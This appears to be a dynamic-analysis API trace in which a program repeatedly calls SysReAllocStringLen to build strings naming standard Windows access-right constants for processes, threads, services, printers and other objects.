[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a2e940*="SECTION_EXTEND_SIZE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a2e930*="FILE_MAP_READ") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a2e920*="FILE_MAP_WRITE") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a2e910*="FILE_MAP_COPY") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a2e900*="FILE_MAP_ALL_ACCESS") returned 1
[0202.049] SysReAllocStringLen (in: pbstr=0x2a2e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e8d0*="STANDARD_RIGHTS_READ") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e8b0*="DELETE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e8a0*="READ_CONTROL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e890*="WRITE_OWNER") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e880*="WRITE_DAC") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e870*="MUTEX_MODIFY_STATE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e860*="MUTEX_ALL_ACCESS") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e840*="STANDARD_RIGHTS_WRITE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e830*="STANDARD_RIGHTS_READ") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e820*="STANDARD_RIGHTS_ALL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e810*="DELETE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e800*="READ_CONTROL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e7f0*="WRITE_OWNER") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e7e0*="WRITE_DAC") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e7d0*="EVENT_MODIFY_STATE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e7c0*="EVENT_ALL_ACCESS") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e790*="STANDARD_RIGHTS_READ") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e780*="STANDARD_RIGHTS_ALL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e770*="DELETE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e760*="READ_CONTROL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e750*="WRITE_OWNER") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e740*="WRITE_DAC") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a2e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a2e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e700*="STANDARD_RIGHTS_WRITE") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e6f0*="STANDARD_RIGHTS_READ") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0202.050] SysReAllocStringLen (in: pbstr=0x2a2e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e6d0*="DELETE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e6c0*="READ_CONTROL") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e6b0*="WRITE_OWNER") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e6a0*="WRITE_DAC") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a2e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a2e680*="JOB_OBJECT_TERMINATE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a2e670*="JOB_OBJECT_QUERY") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a2e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a2e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a2e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e620*="STANDARD_RIGHTS_WRITE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e610*="STANDARD_RIGHTS_READ") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e600*="STANDARD_RIGHTS_ALL") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e5f0*="DELETE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e5e0*="READ_CONTROL") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e5d0*="WRITE_OWNER") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e5c0*="WRITE_DAC") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a2e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a2e5a0*="THREAD_IMPERSONATE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a2e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a2e580*="THREAD_QUERY_INFORMATION") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a2e570*="THREAD_SET_INFORMATION") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a2e560*="THREAD_SET_CONTEXT") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a2e550*="THREAD_GET_CONTEXT") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a2e540*="THREAD_SUSPEND_RESUME") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a2e530*="THREAD_TERMINATE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a2e520*="THREAD_ALL_ACCESS") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e500*="STANDARD_RIGHTS_WRITE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e4f0*="STANDARD_RIGHTS_READ") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e4d0*="DELETE") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e4c0*="READ_CONTROL") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e4b0*="WRITE_OWNER") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e4a0*="WRITE_DAC") returned 1
[0202.051] SysReAllocStringLen (in: pbstr=0x2a2e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a2e490*="PROCESS_QUERY_INFORMATION") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a2e480*="PROCESS_SET_INFORMATION") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a2e470*="PROCESS_SET_QUOTA") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a2e460*="PROCESS_CREATE_PROCESS") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a2e450*="PROCESS_DUP_HANDLE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a2e440*="PROCESS_VM_WRITE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a2e430*="PROCESS_VM_READ") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a2e420*="PROCESS_VM_OPERATION") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a2e410*="PROCESS_SET_SESSIONID") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a2e400*="PROCESS_CREATE_THREAD") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a2e3f0*="PROCESS_TERMINATE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e3e0*="PROCESS_ALL_ACCESS") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e3b0*="STANDARD_RIGHTS_READ") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e390*="DELETE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e380*="READ_CONTROL") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e370*="WRITE_OWNER") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e360*="WRITE_DAC") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a2e350*="PERM_FILE_CREATE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a2e340*="PERM_FILE_WRITE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a2e330*="PERM_FILE_READ") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e310*="STANDARD_RIGHTS_WRITE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e300*="STANDARD_RIGHTS_READ") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e2e0*="DELETE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e2d0*="READ_CONTROL") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e2c0*="WRITE_OWNER") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e2b0*="WRITE_DAC") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a2e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a2e290*="PRINTER_ACCESS_USE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a2e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a2e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a2e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0202.052] SysReAllocStringLen (in: pbstr=0x2a2e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e250*="PRINTER_ALL_ACCESS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a2e240*="PRINTER_EXECUTE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a2e230*="PRINTER_WRITE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a2e220*="PRINTER_READ") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e210*="PRINTER_ALL_ACCESS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e200*="DELETE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e1f0*="READ_CONTROL") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e1e0*="WRITE_OWNER") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e1d0*="WRITE_DAC") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a2e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a2e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a2e1a0*="SC_MANAGER_LOCK") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a2e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a2e180*="SC_MANAGER_CONNECT") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a2e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a2e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e140*="STANDARD_RIGHTS_WRITE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e130*="STANDARD_RIGHTS_READ") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e120*="STANDARD_RIGHTS_ALL") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e110*="DELETE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e100*="READ_CONTROL") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e0f0*="WRITE_OWNER") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e0e0*="WRITE_DAC") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a2e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a2e0c0*="SERVICE_STOP") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a2e0b0*="SERVICE_START") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a2e0a0*="SERVICE_QUERY_STATUS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a2e090*="SERVICE_QUERY_CONFIG") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a2e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a2e070*="SERVICE_INTERROGATE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a2e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a2e050*="SERVICE_CHANGE_CONFIG") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e040*="SERVICE_ALL_ACCESS") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e020*="STANDARD_RIGHTS_WRITE") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e010*="STANDARD_RIGHTS_READ") returned 1
[0202.053] SysReAllocStringLen (in: pbstr=0x2a2e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e000*="STANDARD_RIGHTS_ALL") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2dff0*="DELETE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2dfe0*="READ_CONTROL") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2dfd0*="WRITE_OWNER") returned 1
